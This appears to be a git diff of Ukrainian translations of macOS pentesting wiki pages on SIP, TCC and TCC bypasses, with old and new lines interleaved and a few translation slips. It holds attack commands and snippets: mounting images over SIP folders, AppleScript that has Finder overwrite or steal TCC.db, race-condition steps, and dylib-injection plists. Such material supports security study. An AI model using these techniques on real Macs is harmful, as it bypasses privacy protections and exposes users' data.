У [**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/) було виявлено, що той же процес **`system_installd`** все ще можна зловживати, оскільки він поміщав **скрипт після установки в папку з випадковою назвою, захищену SIP у `/tmp`**. Справа в тому, що **`/tmp` сам по собі не захищений SIP**, тому було можливим **змонтувати** **віртуальний образ на ньому**, потім **установник** помістив би туди **скрипт після установки**, **зняв би** віртуальний образ, **відтворив би** всі **папки** та **додав би** **скрипт після установки** з **payload** для виконання.
У [**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/) було виявлено, що той же процес **`system_installd`** все ще можна зловживати, оскільки він поміщав **скрипт після установки в папку з випадковою назвою, захищену SIP у `/tmp`**. Справа в тому, що **`/tmp` сам по собі не захищений SIP**, тому було можливо **підключити** **віртуальний образ до нього**, потім **установник** помістив би туди **скрипт після установки**, **відмонтував** віртуальний образ, **відтворив** усі **папки** та **додав** **скрипт після установки** з **payload** для виконання.
#### [fsck_cs utility](https://www.theregister.com/2016/03/30/apple_os_x_rootless/)
Виявлено вразливість, при якій **`fsck_cs`** був введений в оману, що призвело до пошкодження важливого файлу, через його здатність слідувати **символічним посиланням**. Зокрема, зловмисники створили посилання з _`/dev/diskX`_ на файл `/System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist`. Виконання **`fsck_cs`** на _`/dev/diskX`_ призвело до пошкодження `Info.plist`. Цілісність цього файлу є життєво важливою для SIP (Системи захисту цілісності), яка контролює завантаження розширень ядра. Після пошкодження здатність SIP керувати виключеннями ядра порушується.
Виявлено вразливість, при якій **`fsck_cs`** був введений в оману, що призвело до пошкодження важливого файлу, через його здатність слідувати **символічним посиланням**. Зокрема, зловмисники створили посилання з _`/dev/diskX`_ на файл `/System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist`. Виконання **`fsck_cs`** на _`/dev/diskX`_ призвело до пошкодження `Info.plist`. Цілісність цього файлу є важливою для SIP (Системи захисту цілісності), яка контролює завантаження розширень ядра. Після пошкодження здатність SIP керувати виключеннями ядра порушується.
Команди для використання цієї вразливості такі:
```bash
@ -147,7 +147,7 @@ reboot
#### [Mount over SIP protected folders](https://www.slideshare.net/i0n1c/syscan360-stefan-esser-os-x-el-capitan-sinking-the-ship)
Було можливим змонтувати нову файлову систему поверх **SIP захищених папок, щоб обійти захист**.
Було можливим змонтувати нову файлову систему над **SIP захищеними папками, щоб обійти захист**.
```bash
mkdir evil
# Add contento to the folder
@ -160,11 +160,11 @@ hdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg
```bash
/usr/sbin/bless -setBoot -folder /Volumes/Macintosh HD/macOS Install Data -bootefi /Volumes/Macintosh HD/macOS Install Data/boot.efi -options config="\macOS Install Data\com.apple.Boot" -label macOS Installer
```
Безпека цього процесу може бути скомпрометована, якщо зловмисник змінює образ оновлення (`InstallESD.dmg`) перед завантаженням. Стратегія полягає в заміні динамічного завантажувача (dyld) на шкідливу версію (`libBaseIA.dylib`). Ця заміна призводить до виконання коду зловмисника, коли ініціюється інсталятор.
Безпека цього процесу може бути скомпрометована, якщо зловмисник змінить образ оновлення (`InstallESD.dmg`) перед завантаженням. Стратегія полягає в заміні динамічного завантажувача (dyld) на шкідливу версію (`libBaseIA.dylib`). Ця заміна призводить до виконання коду зловмисника, коли ініціюється інсталятор.
Код зловмисника отримує контроль під час процесу оновлення, експлуатуючи довіру системи до інсталятора. Атака продовжується шляхом зміни образу `InstallESD.dmg` за допомогою методу swizzling, зокрема, націлюючись на метод `extractBootBits`. Це дозволяє інжектувати шкідливий код перед використанням образу диска.
Код зловмисника отримує контроль під час процесу оновлення, експлуатуючи довіру системи до інсталятора. Атака продовжується шляхом зміни образу `InstallESD.dmg` за допомогою методу swizzling, особливо націлюючись на метод `extractBootBits`. Це дозволяє інжектувати шкідливий код перед використанням образу диска.
Більше того, в `InstallESD.dmg` є `BaseSystem.dmg`, який слугує кореневою файловою системою коду оновлення. Інжекція динамічної бібліотеки в цей файл дозволяє шкідливому коду працювати в процесі, здатному змінювати файли на рівні ОС, що значно підвищує потенціал компрометації системи.
Більше того, в `InstallESD.dmg` є `BaseSystem.dmg`, який слугує кореневою файловою системою коду оновлення. Інжекція динамічної бібліотеки в цей файл дозволяє шкідливому коду працювати в процесі, здатному змінювати файли на рівні ОС, що значно підвищує потенціал для компрометації системи.
#### [systemmigrationd (2023)](https://www.youtube.com/watch?v=zxZesAN-TEk)
@ -176,32 +176,32 @@ hdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg
```bash
/usr/bin/chflags -h norestricted "${SHARED_SUPPORT_PATH}/SharedSupport.dmg"
```
і було можливим створити символічне посилання в `${SHARED_SUPPORT_PATH}/SharedSupport.dmg`, яке дозволяло б користувачу **обійти обмеження на будь-який файл, минаючи захист SIP**.
і було можливим створити символічне посилання в `${SHARED_SUPPORT_PATH}/SharedSupport.dmg`, яке дозволяло б користувачу **обійти обмеження на будь-який файл, ігноруючи захист SIP**.
### **com.apple.rootless.install**
> [!CAUTION]
> Право **`com.apple.rootless.install`** дозволяє обійти SIP
Право `com.apple.rootless.install` відоме тим, що обминає Захист цілісності системи (SIP) на macOS. Це було особливо згадано у зв'язку з [**CVE-2022-26712**](https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/).
Право `com.apple.rootless.install` відоме тим, що обіймає захист цілісності системи (SIP) на macOS. Це було особливо згадано у зв'язку з [**CVE-2022-26712**](https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/).
У цьому конкретному випадку, система XPC-сервіс, розташований за адресою `/System/Library/PrivateFrameworks/ShoveService.framework/Versions/A/XPCServices/SystemShoveService.xpc`, має це право. Це дозволяє відповідному процесу обійти обмеження SIP. Крім того, цей сервіс помітно пропонує метод, який дозволяє переміщення файлів без застосування будь-яких заходів безпеки.
## Запечатані системні знімки
Запечатані системні знімки це функція, введена Apple в **macOS Big Sur (macOS 11)** як частина механізму **Захисту цілісності системи (SIP)** для забезпечення додаткового рівня безпеки та стабільності системи. Вони по суті є версіями системного тому, доступними лише для читання.
Запечатані системні знімки - це функція, введена Apple в **macOS Big Sur (macOS 11)** як частина механізму **захисту цілісності системи (SIP)** для забезпечення додаткового рівня безпеки та стабільності системи. Вони по суті є версіями системного тому тільки для читання.
Ось більш детальний огляд:
1. **Незмінна система**: Запечатані системні знімки роблять об'єм системи macOS "незмінним", що означає, що його не можна змінювати. Це запобігає будь-яким несанкціонованим або випадковим змінам системи, які можуть загрожувати безпеці або стабільності системи.
2. **Оновлення програмного забезпечення системи**: Коли ви встановлюєте оновлення або апгрейди macOS, macOS створює новий системний знімок. Об'єм завантаження macOS потім використовує **APFS (Apple File System)** для переходу на цей новий знімок. Весь процес застосування оновлень стає безпечнішим і надійнішим, оскільки система завжди може повернутися до попереднього знімка, якщо щось піде не так під час оновлення.
3. **Розділення даних**: У поєднанні з концепцією розділення даних і системного обму, введеною в macOS Catalina, функція запечатаного системного знімка забезпечує, що всі ваші дані та налаштування зберігаються на окремому обмі "**Data**". Це розділення робить ваші дані незалежними від системи, що спрощує процес оновлення системи та підвищує безпеку системи.
1. **Незмінна система**: Запечатані системні знімки роблять системний том macOS "незмінним", що означає, що його не можна змінювати. Це запобігає будь-яким несанкціонованим або випадковим змінам системи, які можуть загрожувати безпеці або стабільності системи.
2. **Оновлення програмного забезпечення системи**: Коли ви встановлюєте оновлення або апгрейди macOS, macOS створює новий системний знімок. Тоді стартовий том macOS використовує **APFS (Apple File System)** для переходу на цей новий знімок. Весь процес застосування оновлень стає безпечнішим і надійнішим, оскільки система завжди може повернутися до попереднього знімка, якщо щось піде не так під час оновлення.
3. **Розділення даних**: У поєднанні з концепцією розділення даних і системного тому, введеною в macOS Catalina, функція запечатаного системного знімка забезпечує, що всі ваші дані та налаштування зберігаються на окремому томі "**Data**". Це розділення робить ваші дані незалежними від системи, що спрощує процес оновлень системи та підвищує безпеку системи.
Пам'ятайте, що ці знімки автоматично керуються macOS і не займають додаткового місця на вашому диску завдяки можливостям спільного використання простору APFS. Також важливо зазначити, що ці знімки відрізняються від **знімків Time Machine**, які є резервними копіями всієї системи, доступними для користувача.
### Перевірка знімків
Команда **`diskutil apfs list`** перераховує **деталі обмів APFS** та їхнє розташування:
Команда **`diskutil apfs list`** перераховує **деталі томів APFS** та їхнє розташування:
<pre><code>+-- Container disk3 966B902E-EDBA-4775-B743-CF97A0556A13
| ====================================================
@ -242,9 +242,9 @@ hdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg
У попередньому виводі можна побачити, що **доступні для користувача місця** змонтовані під `/System/Volumes/Data`.
Крім того, **знімок системного обму macOS** змонтований у `/` і він **запечатаний** (криптографічно підписаний ОС). Отже, якщо SIP буде обійдено і його змінять, **ОС більше не завантажиться**.
Крім того, **знімок системного тому macOS** змонтований у `/` і він **запечатаний** (криптографічно підписаний ОС). Отже, якщо SIP буде обійдено і його змінять, **ОС більше не завантажиться**.
Також можна **перевірити, що запечатка увімкнена**, запустивши:
Також можливо **перевірити, що запечатка увімкнена**, запустивши:
```bash
csrutil authenticated-root status
Authenticated Root status: enabled

40
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
View File

@ -6,11 +6,11 @@
**TCC (Прозорість, Згода та Контроль)** - це протокол безпеки, що зосереджується на регулюванні дозволів додатків. Його основна роль полягає в захисті чутливих функцій, таких як **сервіси геолокації, контакти, фотографії, мікрофон, камера, доступ до можливостей для людей з обмеженими можливостями та повний доступ до диска**. Вимагаючи явної згоди користувача перед наданням доступу додатка до цих елементів, TCC підвищує конфіденційність і контроль користувача над своїми даними.
Користувачі стикаються з TCC, коли додатки запитують доступ до захищених функцій. Це видно через запит, який дозволяє користувачам **схвалити або відхилити доступ**. Крім того, TCC враховує прямі дії користувача, такі як **перетягування та скидання файлів у додаток**, щоб надати доступ до конкретних файлів, забезпечуючи, щоб додатки мали доступ лише до того, що явно дозволено.
Користувачі стикаються з TCC, коли додатки запитують доступ до захищених функцій. Це видно через запит, який дозволяє користувачам **схвалити або відхилити доступ**. Крім того, TCC враховує прямі дії користувача, такі як **перетягування та скидання файлів у додаток**, щоб надати доступ до конкретних файлів, забезпечуючи, що додатки мають доступ лише до того, що явно дозволено.
![Приклад запиту TCC](https://rainforest.engineering/images/posts/macos-tcc/tcc-prompt.png?1620047855)
**TCC** обробляється **демоном**, розташованим у `/System/Library/PrivateFrameworks/TCC.framework/Support/tccd` і налаштованим у `/System/Library/LaunchDaemons/com.apple.tccd.system.plist` (реєстрація служби mach `com.apple.tccd.system`).
**TCC** обробляється **демоном**, розташованим у `/System/Library/PrivateFrameworks/TCC.framework/Support/tccd`, і налаштовується в `/System/Library/LaunchDaemons/com.apple.tccd.system.plist` (реєстрація служби mach `com.apple.tccd.system`).
Існує **tccd у режимі користувача**, що працює для кожного увійшовшого користувача, визначеного в `/System/Library/LaunchAgents/com.apple.tccd.plist`, реєструючи служби mach `com.apple.tccd` та `com.apple.usernotifications.delegate.com.apple.tccd`.
@ -22,9 +22,9 @@ ps -ef | grep tcc
```
Дозволи **наследуються від батьківського** додатку, а **дозволи** **відстежуються** на основі **Bundle ID** та **Developer ID**.
### TCC бази даних
### Бази даних TCC
Дозволи/заборони зберігаються в деяких TCC базах даних:
Дозволи/заборони зберігаються в деяких базах даних TCC:
- Системна база даних у **`/Library/Application Support/com.apple.TCC/TCC.db`**.
- Ця база даних **захищена SIP**, тому лише обхід SIP може записувати в неї.
@ -34,12 +34,12 @@ ps -ef | grep tcc
> [!WARNING]
> Попередні бази даних також **захищені TCC для доступу на читання**. Тому ви **не зможете прочитати** вашу звичайну базу даних TCC користувача, якщо це не з процесу з привілеями TCC.
>
> Однак пам'ятайте, що процес з цими високими привілеями (як **FDA** або **`kTCCServiceEndpointSecurityClient`**) зможе записувати в базу даних TCC користувача.
> Однак пам'ятайте, що процес з такими високими привілеями (як **FDA** або **`kTCCServiceEndpointSecurityClient`**) зможе записувати в базу даних TCC користувача.
- Є **третя** база даних TCC у **`/var/db/locationd/clients.plist`**, щоб вказати клієнтів, яким дозволено **доступ до служб геолокації**.
- Файл, захищений SIP, **`/Users/carlospolop/Downloads/REG.db`** (також захищений від доступу на читання з TCC), містить **місцезнаходження** всіх **дійсних TCC баз даних**.
- Файл, захищений SIP, **`/Users/carlospolop/Downloads/MDMOverrides.plist`** (також захищений від доступу на читання з TCC), містить більше наданих дозволів TCC.
- Файл, захищений SIP, **`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`** (може бути прочитаний будь-ким) є списком дозволених додатків, які потребують винятку TCC.
- Існує **третя** база даних TCC у **`/var/db/locationd/clients.plist`**, щоб вказати клієнтів, яким дозволено **доступ до служб геолокації**.
- Файл, захищений SIP **`/Users/carlospolop/Downloads/REG.db`** (також захищений від доступу на читання з TCC), містить **місцезнаходження** всіх **дійсних баз даних TCC**.
- Файл, захищений SIP **`/Users/carlospolop/Downloads/MDMOverrides.plist`** (також захищений від доступу на читання з TCC), містить більше наданих дозволів TCC.
- Файл, захищений SIP **`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`** (доступний для читання будь-ким), є списком дозволених додатків, які потребують винятку TCC.
> [!TIP]
> База даних TCC в **iOS** знаходиться в **`/private/var/mobile/Library/TCC/TCC.db`**.
@ -184,7 +184,7 @@ tccutil reset All app.some.id
# Reset the permissions granted to all apps
tccutil reset All
```
### TCC Перевірки підпису
### TCC Signature Checks
База даних TCC **зберігає** **Bundle ID** програми, але також **зберігає** **інформацію** про **підпис**, щоб **переконатися**, що програма, яка запитує використання дозволу, є правильною.
```bash
@ -254,13 +254,13 @@ uuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3
>
> Також зверніть увагу, що якщо ви перемістите файл, який дозволяє UUID програми на вашому комп'ютері, на інший комп'ютер, оскільки та сама програма матиме різні UID, це не надасть доступу до цієї програми.
Розширений атрибут `com.apple.macl` **не може бути очищений** як інші розширені атрибути, оскільки він **захищений SIP**. Однак, як [**пояснено в цьому пості**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/), можливо відключити його, **зжавши** файл, **видаливши** його та **розжавши** його.
Розширений атрибут `com.apple.macl` **не може бути очищений** як інші розширені атрибути, оскільки він **захищений SIP**. Однак, як [**пояснено в цьому пості**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/), можливо відключити його, **запакувавши** файл, **видаливши** його та **розпакувавши** його.
## TCC Privesc & Bypasses
### Вставка в TCC
Якщо в якийсь момент вам вдасться отримати доступ на запис до бази даних TCC, ви можете використати щось подібне до наступного, щоб додати запис (видаліть коментарі):
Якщо в якийсь момент вам вдасться отримати доступ на запис до бази даних TCC, ви можете використати щось на зразок наступного, щоб додати запис (видаліть коментарі):
<details>
@ -345,7 +345,7 @@ EOD
```
{{#endtab}}
{{#tab name="Викрадення систем TCC.db"}}
{{#tab name="Steal systems TCC.db"}}
```applescript
osascript<<EOD
tell application "Finder"
@ -370,7 +370,7 @@ EOD
<figure><img src="../../../../images/image (27).png" alt="" width="244"><figcaption></figcaption></figure>
> [!CAUTION]
> Зверніть увагу, що оскільки додаток **Automator** має дозвіл TCC **`kTCCServiceAppleEvents`**, він може **контролювати будь-який додаток**, наприклад, Finder. Отже, маючи дозвіл контролювати Automator, ви також можете контролювати **Finder** за допомогою коду, подібного до наведеного нижче:
> Зверніть увагу, що оскільки додаток **Automator** має дозвіл TCC **`kTCCServiceAppleEvents`**, він може **керувати будь-яким додатком**, таким як Finder. Отже, маючи дозвіл на керування Automator, ви також можете керувати **Finder** за допомогою коду, як показано нижче:
<details>
@ -398,7 +398,7 @@ EOD
Те ж саме відбувається з **додатком Script Editor,** він може контролювати Finder, але за допомогою AppleScript ви не можете змусити його виконати скрипт.
### Автоматизація (SE) до деякого TCC
### Автоматизація (SE) до деяких TCC
**System Events можуть створювати дії для папок, а дії для папок можуть отримувати доступ до деяких папок TCC** (Робочий стіл, Документи та Завантаження), тому скрипт, подібний до наступного, може бути використаний для зловживання цією поведінкою:
```bash
@ -444,9 +444,9 @@ rm "$HOME/Desktop/file"
```
### Автоматизація (SE) + Доступність (**`kTCCServicePostEvent`|**`kTCCServiceAccessibility`**)** до FDA\*
Автоматизація на **`System Events`** + Доступність (**`kTCCServicePostEvent`**) дозволяє надсилати **натискання клавіш процесам**. Таким чином, ви можете зловживати Finder для зміни TCC.db користувачів або для надання FDA довільному додатку (хоча для цього може бути запитаний пароль).
Автоматизація на **`System Events`** + Доступність (**`kTCCServicePostEvent`**) дозволяє надсилати **натискання клавіш процесам**. Таким чином, ви можете зловживати Finder для зміни TCC.db користувача або для надання FDA довільному додатку (хоча може бути запит на пароль для цього).
Приклад перезапису TCC.db користувачів за допомогою Finder:
Приклад перезапису TCC.db користувача за допомогою Finder:
```applescript
-- store the TCC.db file to copy in /tmp
osascript <<EOF
@ -494,7 +494,7 @@ EOF
```
### `kTCCServiceAccessibility` до FDA\*
Перегляньте цю сторінку для деяких [**payloads для зловживання дозволами доступу**](macos-tcc-payloads.md#accessibility) для підвищення привілеїв до FDA\* або запуску кейлогера, наприклад.
Перегляньте цю сторінку для деяких [**payloads для зловживання дозволами доступу**](macos-tcc-payloads.md#accessibility) для підвищення привілеїв до FDA\* або, наприклад, для запуску кейлогера.
### **Клієнт безпеки кінцевих точок до FDA**
@ -518,14 +518,14 @@ EOF
### **Обхід SIP для обходу TCC**
Системна **база даних TCC** захищена **SIP**, тому лише процеси з **вказаними правами можуть змінювати** її. Тому, якщо зловмисник знайде **обхід SIP** через **файл** (зможе змінити файл, обмежений SIP), він зможе:
Системна **база даних TCC** захищена **SIP**, тому лише процеси з **вказаними правами можуть змінювати** її. Отже, якщо зловмисник знайде **обхід SIP** через **файл** (зможе змінити файл, обмежений SIP), він зможе:
- **Видалити захист** бази даних TCC і надати собі всі дозволи TCC. Він міг би зловживати будь-яким з цих файлів, наприклад:
- Системна база даних TCC
- REG.db
- MDMOverrides.plist
Однак є ще один варіант зловживання цим **обхідним шляхом SIP для обходу TCC**, файл `/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist` є списком дозволених програм, які потребують винятку TCC. Тому, якщо зловмисник зможе **видалити захист SIP** з цього файлу і додати свою **власну програму**, програма зможе обійти TCC.\
Однак є ще один варіант зловживання цим **обхід SIP для обходу TCC**, файл `/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist` є списком дозволених програм, які потребують винятку TCC. Отже, якщо зловмисник може **видалити захист SIP** з цього файлу і додати свою **власну програму**, програма зможе обійти TCC.\
Наприклад, щоб додати термінал:
```bash
# Get needed info

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md
View File

@ -4,9 +4,9 @@
## Basic Information
**Apple Events** - це функція в macOS від Apple, яка дозволяє додаткам спілкуватися один з одним. Вони є частиною **Apple Event Manager**, який є компонентом операційної системи macOS, відповідальним за обробку міжпроцесного спілкування. Ця система дозволяє одному додатку надсилати повідомлення іншому додатку з проханням виконати певну операцію, наприклад, відкрити файл, отримати дані або виконати команду.
**Apple Events** це функція в macOS від Apple, яка дозволяє додаткам спілкуватися один з одним. Вони є частиною **Apple Event Manager**, який є компонентом операційної системи macOS, відповідальним за обробку міжпроцесного спілкування. Ця система дозволяє одному додатку надсилати повідомлення іншому додатку з проханням виконати певну операцію, наприклад, відкрити файл, отримати дані або виконати команду.
Основний демон - це `/System/Library/CoreServices/appleeventsd`, який реєструє сервіс `com.apple.coreservices.appleevents`.
Демон mina — це `/System/Library/CoreServices/appleeventsd`, який реєструє сервіс `com.apple.coreservices.appleevents`.
Кожен додаток, який може отримувати події, перевіряє цей демон, надаючи свій Apple Event Mach Port. І коли додаток хоче надіслати подію, він запитує цей порт у демона.

51
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
View File

@ -166,13 +166,12 @@ $> ls ~/Documents
### SQLITE_SQLLOG_DIR - CVE-2023-32422
Якщо **`SQLITE_SQLLOG_DIR="path/folder"`**, це в основному означає, що **будь-яка відкрита база даних копіюється в цей шлях**. У цьому CVE цей контроль був зловжито для **запису** всередині **SQLite бази даних**, яка буде **відкрита процесом з FDA базою даних TCC**, а потім зловжити **`SQLITE_SQLLOG_DIR`** з **символічним посиланням у назві файлу**, так що коли ця база даних **відкрита**, користувач **TCC.db перезаписується** з відкритою.
**Більше інформації** [**в описі**](https://gergelykalman.com/sqlol-CVE-2023-32422-a-macos-tcc-bypass.html) **та** [**в доповіді**](https://www.youtube.com/watch?v=f1HA5QhLQ7Y&t=20548s).
Якщо **`SQLITE_SQLLOG_DIR="path/folder"`**, це в основному означає, що **будь-яка відкрита база даних копіюється в цей шлях**. У цьому CVE цей контроль був зловжито для **запису** всередину **SQLite бази даних**, яка буде **відкрита процесом з FDA базою даних TCC**, а потім зловживати **`SQLITE_SQLLOG_DIR`** з **символічним посиланням у назві файлу**, так що коли ця база даних **відкрита**, користувач **TCC.db перезаписується** з відкритою.\
**Більше інформації** [**в описі**](https://gergelykalman.com/sqlol-CVE-2023-32422-a-macos-tcc-bypass.html) **і**[ **в доповіді**](https://www.youtube.com/watch?v=f1HA5QhLQ7Y&t=20548s).
### **SQLITE_AUTO_TRACE**
Якщо змінна середовища **`SQLITE_AUTO_TRACE`** встановлена, бібліотека **`libsqlite3.dylib`** почне **реєструвати** всі SQL запити. Багато додатків використовували цю бібліотеку, тому було можливим реєструвати всі їхні SQLite запити.
Якщо змінна середовища **`SQLITE_AUTO_TRACE`** встановлена, бібліотека **`libsqlite3.dylib`** почне **логувати** всі SQL запити. Багато додатків використовували цю бібліотеку, тому було можливим логувати всі їхні SQLite запити.
Кілька додатків Apple використовували цю бібліотеку для доступу до захищеної інформації TCC.
```bash
@ -191,7 +190,7 @@ launchctl setenv SQLITE_AUTO_TRACE 1
Це тимчасове записування файлу, за яким слідує **`rename(old, new)`**, **яке не є безпечним.**
Це не безпечно, оскільки потрібно **окремо вирішити старі та нові шляхи**, що може зайняти деякий час і бути вразливим до умови гонки. Для отримання додаткової інформації ви можете ознайомитися з функцією `xnu` `renameat_internal()`.
Це не безпечно, оскільки потрібно **окремо вирішити старі та нові шляхи**, що може зайняти деякий час і бути вразливим до Race Condition. Для отримання додаткової інформації ви можете ознайомитися з функцією `xnu` `renameat_internal()`.
> [!CAUTION]
> Отже, в основному, якщо привілейований процес перейменовує з папки, якою ви керуєте, ви можете отримати RCE і змусити його отримати доступ до іншого файлу або, як у цьому CVE, відкрити файл, який створила привілейована програма, і зберегти FD.
@ -207,7 +206,7 @@ launchctl setenv SQLITE_AUTO_TRACE 1
- зловити `open()` `/Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX` (X - випадковий)
- тут ми також `open()` цей файл для запису і тримаємо дескриптор файлу
- атомарно переключити `/Users/hacker/tmp` з `/Users/hacker/ourlink` **в циклі**
- ми робимо це, щоб максимізувати наші шанси на успіх, оскільки вікно гонки досить вузьке, але програш у гонці має незначні недоліки
- ми робимо це, щоб максимізувати наші шанси на успіх, оскільки вікно гонки досить вузьке, але програш гонки має незначні недоліки
- почекати трохи
- перевірити, чи пощастило
- якщо ні, запустити знову з самого початку
@ -219,7 +218,7 @@ launchctl setenv SQLITE_AUTO_TRACE 1
### Apple Remote Desktop
Як root ви можете активувати цю службу, і **агент ARD матиме повний доступ до диска**, що може бути зловживано користувачем для копіювання нової **бази даних користувача TCC**.
Як root ви можете увімкнути цю службу, і **агент ARD матиме повний доступ до диска**, що може бути зловжито користувачем для копіювання нової **бази даних користувача TCC**.
## За **NFSHomeDirectory**
@ -237,27 +236,27 @@ TCC використовує базу даних у домашній папці
**Перший POC** використовує [**dsexport**](https://www.unix.com/man-page/osx/1/dsexport/) і [**dsimport**](https://www.unix.com/man-page/osx/1/dsimport/), щоб змінити **HOME** папку користувача.
1. Отримати _csreq_ блоб для цільового додатку.
2. Посадити підроблений _TCC.db_ файл з необхідним доступом і _csreq_ блобом.
1. Отримати _csreq_ blob для цільового додатку.
2. Посадити підроблений _TCC.db_ файл з необхідним доступом і _csreq_ blob.
3. Експортувати запис служби каталогів користувача за допомогою [**dsexport**](https://www.unix.com/man-page/osx/1/dsexport/).
4. Змінити запис служби каталогів, щоб змінити домашню папку користувача.
5. Імпортувати змінений запис служби каталогів за допомогою [**dsimport**](https://www.unix.com/man-page/osx/1/dsimport/).
6. Зупинити _tccd_ користувача і перезавантажити процес.
Другий POC використовував **`/usr/libexec/configd`**, який мав `com.apple.private.tcc.allow` зі значенням `kTCCServiceSystemPolicySysAdminFiles`.\
Було можливим запустити **`configd`** з параметром **`-t`**, зловмисник міг вказати **кастомний пакет для завантаження**. Отже, експлуатація **замінює** методи **`dsexport`** і **`dsimport`** для зміни домашньої папки користувача на **впровадження коду в `configd`**.
Було можливим запустити **`configd`** з параметром **`-t`**, зловмисник міг вказати **кастомний пакет для завантаження**. Отже, експлуатація **замінює** методи **`dsexport`** і **`dsimport`** зміни домашньої папки користувача на **впровадження коду в `configd`**.
Для отримання додаткової інформації перегляньте [**оригінальний звіт**](https://www.microsoft.com/en-us/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/).
## За допомогою ін'єкції процесу
## За допомогою впровадження процесу
Існують різні техніки для ін'єкції коду всередину процесу та зловживання його привілеями TCC:
Існують різні техніки для впровадження коду в процес і зловживання його привілеями TCC:
{{#ref}}
../../../macos-proces-abuse/
{{#endref}}
Більше того, найпоширенішою ін'єкцією процесу для обходу TCC є через **плагіни (завантажити бібліотеку)**.\
Більше того, найпоширеніше впровадження процесу для обходу TCC виявлено через **плагіни (завантажити бібліотеку)**.\
Плагіни - це додатковий код, зазвичай у формі бібліотек або plist, які будуть **завантажені основним додатком** і виконуватимуться в його контексті. Отже, якщо основний додаток мав доступ до файлів, обмежених TCC (через надані дозволи або права), **кастомний код також матиме його**.
### CVE-2020-27937 - Directory Utility
@ -270,7 +269,7 @@ TCC використовує базу даних у домашній папці
### CVE-2020-29621 - Coreaudiod
Бінарний файл **`/usr/sbin/coreaudiod`** мав права `com.apple.security.cs.disable-library-validation` і `com.apple.private.tcc.manager`. Перше **дозволяло ін'єкцію коду**, а друге надавало доступ до **керування TCC**.
Бінарний файл **`/usr/sbin/coreaudiod`** мав права `com.apple.security.cs.disable-library-validation` і `com.apple.private.tcc.manager`. Перший **дозволяє впровадження коду**, а другий надає доступ до **управління TCC**.
Цей бінарний файл дозволяв завантажувати **плагіни сторонніх виробників** з папки `/Library/Audio/Plug-Ins/HAL`. Отже, було можливим **завантажити плагін і зловживати дозволами TCC** з цим PoC:
```objectivec
@ -337,7 +336,7 @@ Executable=/Applications/Firefox.app/Contents/MacOS/firefox
</dict>
</plist>
```
Для отримання додаткової інформації про те, як легко експлуатувати це [**перегляньте оригінальний звіт**](https://wojciechregula.blog/post/how-to-rob-a-firefox/).
Для отримання додаткової інформації про те, як легко експлуатувати це [**перевірте оригінальний звіт**](https://wojciechregula.blog/post/how-to-rob-a-firefox/).
### CVE-2020-10006
@ -347,7 +346,7 @@ Executable=/Applications/Firefox.app/Contents/MacOS/firefox
Telegram мав права **`com.apple.security.cs.allow-dyld-environment-variables`** та **`com.apple.security.cs.disable-library-validation`**, тому було можливим зловживання цим для **отримання доступу до його дозволів**, таких як запис з камери. Ви можете [**знайти payload у звіті**](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/).
Зверніть увагу, як використовувати змінну середовища для завантаження бібліотеки, був створений **кастомний plist** для інжекції цієї бібліотеки, і **`launchctl`** був використаний для її запуску:
Зверніть увагу, як використовувати змінну середовища для завантаження бібліотеки, **було створено кастомний plist** для інжекції цієї бібліотеки, і **`launchctl`** було використано для її запуску:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -377,15 +376,15 @@ Telegram мав права **`com.apple.security.cs.allow-dyld-environment-varia
```bash
launchctl load com.telegram.launcher.plist
```
## За допомогою відкритих викликів
## Через відкриті виклики
Можливо викликати **`open`** навіть у пісочниці
Можливо викликати **`open`** навіть під час пісочниці
### Скрипти терміналу
Досить поширено надавати терміналу **Повний доступ до диска (FDA)**, принаймні на комп'ютерах, які використовують технічні спеціалісти. І можливо викликати **`.terminal`** скрипти, використовуючи його.
**`.terminal`** скрипти є plist файлами, такими як цей, з командою для виконання в ключі **`CommandString`**:
**`.terminal`** скрипти - це plist файли, такі як цей, з командою для виконання в ключі **`CommandString`**:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0">
@ -403,7 +402,7 @@ launchctl load com.telegram.launcher.plist
</dict>
</plist>
```
Застосунок може написати термінальний скрипт у такому місці, як /tmp, і запустити його з командою, такою як:
Застосунок може записати термінальний скрипт у такому місці, як /tmp, і запустити його з командою, такою як:
```objectivec
// Write plist in /tmp/tcc.terminal
[...]
@ -416,7 +415,7 @@ exploit_location]; task.standardOutput = pipe;
```
## За допомогою монтування
### CVE-2020-9771 - обхід TCC mount_apfs та підвищення привілеїв
### CVE-2020-9771 - обхід TCC mount_apfs та ескалація привілеїв
**Будь-який користувач** (навіть без привілеїв) може створити та змонтувати знімок Time Machine та **отримати доступ до ВСІХ файлів** цього знімка.\
